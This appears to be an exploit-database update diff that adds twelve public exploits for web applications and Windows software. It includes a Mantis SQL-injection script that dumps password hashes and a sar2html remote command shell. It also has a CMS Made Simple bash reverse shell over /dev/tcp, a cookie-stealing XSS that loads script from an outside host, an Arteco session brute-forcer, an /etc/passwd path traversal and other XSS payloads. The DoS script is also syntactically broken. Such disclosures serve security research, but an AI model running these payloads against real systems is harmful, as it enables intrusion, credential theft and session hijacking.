DB: 2021-01-05

12 changes to exploits/shellcodes

Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
Knockpy 4.1.1 - CSV Injection
Wordpress Core 5.2.2 - 'post previews' XSS
4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
Advanced Comment System 1.0 - 'ACS_path' Path Traversal
sar2html 3.2.1 - 'plot' Remote Code Execution
CMS Made Simple 2.2.15 - RCE (Authenticated)
Subrion CMS 4.2.1 - 'avatar[path]' XSS
Click2Magic 1.1.5 - Stored Cross-Site Scripting
Arteco Web Client DVR/NVR - 'SessionId' Brute Force

exploits/multiple/webapps/49347.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting
+# Exploit Author: Shivam Verma(cyb3r_n3rd)
+# Date: 2020-12-25
+# Google Dork: N/A
+# Vendor Homepage: https://www.click2magic.com/user/agent/index
+# Software Link: https://www.click2magic.com
+# Version: 1.1.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data
+
+Step 1. visit the link
+Step 2. Start a new Chat
+Step 3. When ask for name paste your Xss Payload
+Step 4. Wait for the Administrator to click on Your link
+Step 5. You will receive Admin Cookie Everytime he Process the Request
+
+---
+
+XSS Payload: "><script src=https://.xss.ht></script>

exploits/php/webapps/49338.txt

@@ -0,0 +1,68 @@
+# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS
+# Date: 31/12/2020
+# Exploit Author: gx1  <g.per45[at]gmail.com>
+# Vulnerability Discovery: Simon Scannell
+# Vendor Homepage: https://wordpress.com/
+# Software Link: https://github.com/WordPress/WordPress
+# Version: <= 5.2.2
+# Tested on: any
+# CVE: CVE-2019-16223
+
+# References: 
+https://nvd.nist.gov/vuln/detail/CVE-2019-16223
+https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
+
+Description: 
+WordPress before 5.2.3 allows XSS in post previews by authenticated users.
+
+Technical Details and Exploitation: 
+The vulnerability is due to two condition: 
+1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability:   
+
+the function sanitizes bad protocols, and applies a convertion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for html entities after two points, as it is possible to 
+observe by the applied fix: 
+
+============================================================================================================================================
+function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) {
++	$string  = preg_replace( '/(&#0*58(?![;0-9])|&#x0*3a(?![;a-f0-9]))/i', '$1;', $string );   # APPLIED FIX AFTER VULNERABILITY DETECTION 
+	$string2 = preg_split( '/:|&#0*58;|&#x0*3a;/i', $string, 2 );
+	if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) {
+
+============================================================================================================================================ 
+This allows an attacker to inject attack strings such as:    
+
+============================================================================================================================================
+<a href="javascript&#58alert(document.domain)">Example Attack</a>
+============================================================================================================================================
+Anyway, Wordpress protects against this attack because it converts any type of html entities during the rendering of posts. In a particular case, during preview, it is possible to inject html entities in a URL. That is the second condition. 
+
+2. During preview, get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity: 
+
+============================================================================================================================================
+function get_the_content( $more_link_text = null, $strip_teaser = false ) {
+
+    ...
+    if ( $preview ) // Preview fix for JavaScript bug with foreign languages.
+        $output =   preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output );
+
+    return $output;
+}
+
+function _convert_urlencoded_to_entities( $match ) {
+    return '&#' . base_convert( $match[1], 16, 10 ) . ';';
+}
+
+============================================================================================================================================
+For this reason, it is possible to send URL encoded strings that will be converted in HTML entities during preview. HTML entities can be crafted to bypass wp_ses_bad_protocol_once() function due to issue described in condition 1. 
+
+Proof Of Concept:  
+1. Create a new post
+2. Insert in code editor the following HTML PoC code:   
+
+<a href="javascript%u003Aalert(/XSS/)">poc</a>
+
+3. Click on preview and click the "poc" link   
+
+Solution: 
+
+Upgrade Wordpress to version >= 5.2.3

exploits/php/webapps/49339.txt

@@ -0,0 +1,21 @@
+# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
+# Date: 30-12-2020
+# Exploit Author: Ritesh Gohil
+# Vendor Homepage: https://www.4homepages.de/
+# Software Link: https://www.4homepages.de/download-4images
+# Version: 1.7.11
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile Image.
+
+Attack Vector:
+This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time
+any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload.
+
+Steps-To-Reproduce:
+1. Login into 4images admin panel.
+2. Now go to the add images tab.
+3. Now paste the below payload in the URL field.
+ritesh"><img src=x onerror=confirm(1)>
+4. Now click on add button. 
+5. The XSS will be triggered.

exploits/php/webapps/49340.py

@@ -0,0 +1,91 @@
+# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
+# Date: 30/12/2020
+# Exploit Author: EthicalHCOP
+# Vendor Homepage: https://www.mantisbt.org/
+# Version: 2.24.3
+# CVE: CVE-2020-28413
+
+import requests, sys, time
+from lxml import etree
+
+proxies = {
+     "http": "http://127.0.0.1:8080",
+     "https": "http://127.0.0.1:8080",
+    }
+
+def Hacer_Peticion(query):
+    home = ""
+    url = home+"/api/soap/mantisconnect.php"
+    headers = {'content-type': 'text/xml',
+               'SOAPAction': url+'"/mc_project_get_users"'}
+    mantis_db_user = ""
+    mantis_db_pass = ""
+    body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect">
+       <soapenv:Header/>
+       <soapenv:Body>
+          <man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+             <username xsi:type="xsd:string">"""+mantis_db_user+"""</username>
+             <password xsi:type="xsd:string">"""+mantis_db_pass+"""</password>
+             <project_id xsi:type="xsd:integer">0</project_id>
+             <access xsi:type="xsd:string">"""+query+"""</access>
+          </man:mc_project_get_users>
+       </soapenv:Body>
+    </soapenv:Envelope>"""
+    response = requests.post(url, data=body, headers=headers, verify=False)
+    #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
+    parser = etree.XMLParser(remove_blank_text=True)
+    xml = etree.XML(response.content, parser)
+    xml = etree.tostring(xml)
+    return(str(xml))
+
+def Cantidad_Usuarios_Mantis():
+    query = "0 union all select concat('-',(select count(*) " \
+            "from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
+    xml = Hacer_Peticion(query)
+    txt = xml.split("integer")
+    txt = txt[1].split("id")
+    registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
+    return(registros)
+
+def Obtener_Id(usr_pos):
+    query = "0 union all select concat((SELECT id FROM mantis_user_table " \
+            "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
+    xml = Hacer_Peticion(query)
+    txt = xml.split("integer")
+    txt = txt[1].split("id")
+    id = str(str(txt[0])[:-2])[-1:]
+    name = str(str(txt[1])[29:]).split("</name>")[0]
+    return (id+"-"+name)
+
+def brute_force(data):
+    charts = "abcdefghijklmnopqrstuvwxyz0123456789"
+    passw = ""
+    id = data.split("-")[0]
+    name = data.split("-")[1]
+    for cp in range (1,33,1):
+        for c in charts:
+            print(f"\rHash: {passw}", end="")
+            time.sleep(0.00001)
+            sys.stdout.flush()
+            query = "0 union all select (select if(substring((select binary(password) " \
+                    "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
+            xml = Hacer_Peticion(query)
+            txt = xml.split("integer")
+            txt = txt[1].split("id")
+            r_id = str(str(txt[0])[:-2])[-1:]
+            if(r_id=="0"):
+                passw = passw + str(c)
+                break
+    print(f"\r", end="")
+    sys.stdout.flush()
+    print(name+": "+passw)
+
+def main():
+    cantidad_users = Cantidad_Usuarios_Mantis()
+    print("Cantidad usuarios en db: "+str(cantidad_users))
+    print("Obteniendo Hashes...")
+    for x in range(0,int(cantidad_users),1):
+        brute_force(Obtener_Id(x))
+
+if __name__ == "__main__":
+    main()

exploits/php/webapps/49343.txt

@@ -0,0 +1,8 @@
+# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
+# Date: Fri, 11 Dec 2020
+# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
+# Vendor Homepage: Advanced Comment System - ACS
+# Version: v1.0
+# CVE: CVE-2020-35598
+
+http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00

exploits/php/webapps/49344.py

@@ -0,0 +1,39 @@
+# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
+# Date: 27-12-2020
+# Exploit Author: Musyoka Ian
+# Vendor Homepage:https://github.com/cemtan/sar2html 
+# Software Link: https://sourceforge.net/projects/sar2html/
+# Version: 3.2.1
+# Tested on: Ubuntu 18.04.1
+
+#!/usr/bin/env python3
+
+import requests
+import re
+from cmd import Cmd
+
+url = input("Enter The url => ")
+
+class Terminal(Cmd):
+    prompt = "Command => "
+    def default(self, args):
+        exploiter(args)
+
+def exploiter(cmd):
+    global url
+    sess = requests.session()
+    output = sess.get(f"{url}/index.php?plot=;{cmd}")
+    try:
+        out = re.findall("<option value=(.*?)>", output.text)
+    except:
+        print ("Error!!")
+    for ouut in out:
+        if "There is no defined host..." not in ouut:
+            if "null selected" not in ouut:
+                if "selected" not in ouut:
+                    print (ouut)
+    print ()
+
+if __name__ == ("__main__"):
+    terminal = Terminal()
+    terminal.cmdloop()

exploits/php/webapps/49345.txt

@@ -0,0 +1,30 @@
+# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
+# Author: Andrey Stoykov
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
+# Version: 2.2.15
+# Tested on: Debian 10 LAMPP
+# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html
+
+Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.
+
+// Vulnerable eval() code
+
+if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {
+
+Reproduction Steps:
+
+1. Login as administrator user and navigate to Extensions->User Defined Tags
+
+2. Add code with the payload of:
+exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");
+
+3. Click on the newly created User Defined Tag and use the Run function
+
+RCE will be achieved:
+
+astoykov@Lubuntu:~$ nc -kvlp 4444
+nc: getnameinfo: Temporary failure in name resolution
+Connection received on 192.168.56.132 53690
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)

exploits/php/webapps/49346.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS
+# Date: 2020-12-15
+# Exploit Author: icekam
+# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>
+# Software Link: https://github.com/intelliants/subrion
+# Version: Subrion CMS 4.2.1
+# CVE : CVE-2020-35437
+
+stored xss vulnerability in /_core/profile/.
+ Reproduce through the avatar[path] parameter in post /_core/profile/ url.
+ payload:"><sCrIpT>alert(1)</sCrIpT>
+
+https://github.com/intelliants/subrion/issues/880

exploits/python/local/49342.txt

@@ -0,0 +1,55 @@
+# Exploit Title: Knockpy 4.1.1 - CSV Injection
+# Author: Dolev Farhi
+# Date: 2020-12-29
+# Vendor Homepage: https://github.com/guelfoweb/knock
+# Version : 4.1.1
+# Tested on: Debian 9.13
+
+Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
+The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.
+
+Vulnerable code segment(s)
+
+# knockpy.py
+
+# row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
+# subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))
+
+# modules/save_report.py
+
+# if fields:
+#  csv_report += 'ip,status,type,domain_name,server\n'
+# for item in report:
+#  csv_report += item + '\n'
+# report = csv_report
+
+
+1. Example malicious Nginx config to return CSV formula headers:
+
+http {
+...    
+  server_tokens off;
+  more_set_headers 'Server: =1336+1';
+...
+}
+
+2. Tester runs Knoockpy
+root@host:~/# python knockpy/knockpy.py -c test.local
+
++ checking for virustotal subdomains: SKIP
+	VirusTotal API_KEY not found
++ checking for wildcard: NO
++ checking for zonetransfer: NO
++ resolving target: YES
+- scanning for subdomain...
+
+Ip Address	Status	Type	Domain Name			Server
+----------	------	----	-----------			------
+127.0.0.1       200     host    appserver.test.local		=1336+1
+
+
+CSV result
+
+root@host:~/# cat test_local.csv
+127.0.0.1,200,host,appserver.test.local,=1336+1
+127.0.0.1,200,host,www.test.local,=1336+1

exploits/windows/dos/49337.py

@@ -0,0 +1,25 @@
+# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
+# Date: 22.12.2020
+# Software Link:  http://www.tucows.com/download/windows/files/ezcdsetup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.13
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run python code :Creator.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Easy CD & DVD Cover Creator.exe
+# 4.- Press Unlock Now
+# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number'
+# 5.- Press 'Continue'and you will see a crash.
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"

exploits/windows/local/49336.txt

@@ -0,0 +1,30 @@
+# Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
+# Discovery by: Thalia Nieto
+# Discovery Date: 02/01/21
+# Vendor Homepage: https://www.minitool.com
+# Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/
+# Tested Version: 3.2
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, name | findstr /i "MTAgentService"
+
+MTAgentService	MTAgentService	C:\Program Files\MiniTool ShadowMaker\AgentService.exe
+
+# Service info:
+
+C:\>sc qc "MTAgentService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: MTAgentService
+        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\MiniTool ShadowMaker\AgentService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : MTAgentService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem

exploits/windows/webapps/49348.py

@@ -0,0 +1,100 @@
+# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force
+# Date: 16.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.arteco-global.com
+
+#!/usr/bin/env python3
+#
+#
+# Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit
+#
+#
+# Vendor: Arteco S.U.R.L.
+# Product web page: https://www.arteco-global.com
+# Affected version: n/a
+#
+# Summary: Arteco DVR/NVR is a mountable industrial surveillance server
+# ideal for those who need to manage IP video surveillance designed for
+# medium to large installations that require high performance and reliability.
+# Arteco can handle IP video sources from all major international manufacturers
+# and is compatible with ONVIF and RTSP devices.
+#
+# Desc: The Session ID 'SessionId' is of an insufficient length and can be
+# exploited by brute force, which may allow a remote attacker to obtain a
+# valid session, bypass authentication and disclose the live camera stream.
+#
+# Tested on: Microsoft Windows 10 Enterprise
+#            Apache/2.4.39 (Win64) OpenSSL/1.0.2s
+#            Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m
+#            Arteco-Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5613
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php
+#
+#
+# 16.11.2020
+#
+
+import sys,requests
+
+class BrutusCookius:
+
+    def __init__(self):
+        self.validate=None
+        self.cookies=None#
+        self.params=None##
+        self.stream=None##
+        self.path=None####
+        self.cgi=None#####
+        self.ip=None######
+        self.op=None######
+
+    def check(self):
+    	print('Usage: ./arteco.py IP')
+    	exit(9)
+
+    def bro(self):
+        if len(sys.argv) !=2:
+            self.check()
+        else:    
+            self.ip=sys.argv[1]
+            print('[+] Target IP: '+self.ip)
+            if not 'http' in self.ip:
+                self.ip='http://{}'.format(self.ip)
+
+    def force(self):
+
+        # Check the Set-Cookie on the target and determine the length (varies per model/version)
+        # Cookie: SessionId=15800 - range(10000,100000)
+        # Cookie: SessionId=8350 - range(1000,10000)
+        # Cookie: SessionId=502 - range(100,1000)
+
+        self.op = range(17129,17149) # Tweak
+        for j in self.op:
+            session=requests.session()
+            self.cookies=dict(SessionId=str(j))
+            sys.stdout.write('[+] Trying ID: '+str(j))
+            self.path='/arteco-mobile/'
+            self.cgi='camera.fcgi'
+            self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1'
+            self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers
+            if not 'artecomobile' in str(self.validate):
+                print(' - NOPE.')
+            else:
+                print(' - BINGO!!!')
+                print('[+] Active session found: '+str(j))
+                print('[+] Use the cookie: SessionId='+str(j))
+                exit(9)
+        print('[!] Sorry, no valid session found.')
+
+    def main(self):
+        self.bro()
+        self.force()
+
+if __name__ == '__main__':
+    BrutusCookius().main()

files_exploits.csv

@@ -6766,6 +6766,7 @@ id,file,description,date,author,type,platform,port
 49206,exploits/windows/dos/49206.txt,"TapinRadio 2.13.7 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49207,exploits/windows/dos/49207.txt,"RarmaRadio 2.72.5 - Denial of Service (PoC)",2020-12-07,"Ismael Nava",dos,windows,
 49283,exploits/multiple/dos/49283.txt,"Nxlog Community Edition 2.10.2150 - DoS (Poc)",2020-12-17,"Guillaume PETIT",dos,multiple,
+49337,exploits/windows/dos/49337.py,"Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)",2021-01-04,stresser,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11233,6 +11234,8 @@ id,file,description,date,author,type,platform,port
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
+49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,
+49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43547,3 +43550,12 @@ id,file,description,date,author,type,platform,port
 49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
 49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
 49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
+49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
+49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
+49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
+49343,exploits/php/webapps/49343.txt,"Advanced Comment System 1.0 - 'ACS_path' Path Traversal",2021-01-04,"Francisco Javier Santiago Vázquez",webapps,php,
+49344,exploits/php/webapps/49344.py,"sar2html 3.2.1 - 'plot' Remote Code Execution",2021-01-04,"Musyoka Ian",webapps,php,
+49345,exploits/php/webapps/49345.txt,"CMS Made Simple 2.2.15 - RCE (Authenticated)",2021-01-04,"Andrey Stoykov",webapps,php,
+49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",2021-01-04,icekam,webapps,php,
+49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",2021-01-04,"Shivam Verma",webapps,multiple,
+49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",2021-01-04,LiquidWorm,webapps,windows,